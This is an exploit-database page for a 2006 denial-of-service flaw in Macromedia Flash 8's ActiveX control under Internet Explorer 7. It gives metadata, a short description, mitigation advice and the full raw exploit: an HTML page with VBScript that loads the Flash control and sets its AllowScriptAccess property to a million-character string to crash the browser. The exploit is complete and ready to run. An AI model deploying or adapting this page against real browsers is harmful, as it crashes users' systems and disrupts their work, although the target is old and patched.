header-logo
Suggest Exploit
vendor:
Flash 8 (Flash8b.ocx)
by:
shinnai
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Flash 8 (Flash8b.ocx)
Affected Version From: Macromedia Flash 8 (Flash8b.ocx)
Affected Version To: Macromedia Flash 8 (Flash8b.ocx)
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7
2006

Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service

A denial of service vulnerability exists in Macromedia Flash 8 (Flash8b.ocx) when used in conjunction with Internet Explorer. By setting the 'AllowScriptAccess' property to a large string, an attacker can cause a denial of service condition. This vulnerability affects Windows XP Professional SP2 with Internet Explorer 7.

Mitigation:

Upgrade to the latest version of Macromedia Flash 8 (Flash8b.ocx) and ensure that Internet Explorer is up to date.
Source

Exploit-DB raw data:

<!--
--------------------------------------------------------------------------
Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->

<html>
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object>
<script language='vbscript'>

argCount = 1

arg1=String(1000000, "A")

Flash8b.AllowScriptAccess=arg1

</script>

# milw0rm.com [2006-12-29]

Navigation

Suggest Exploit

Services By CQR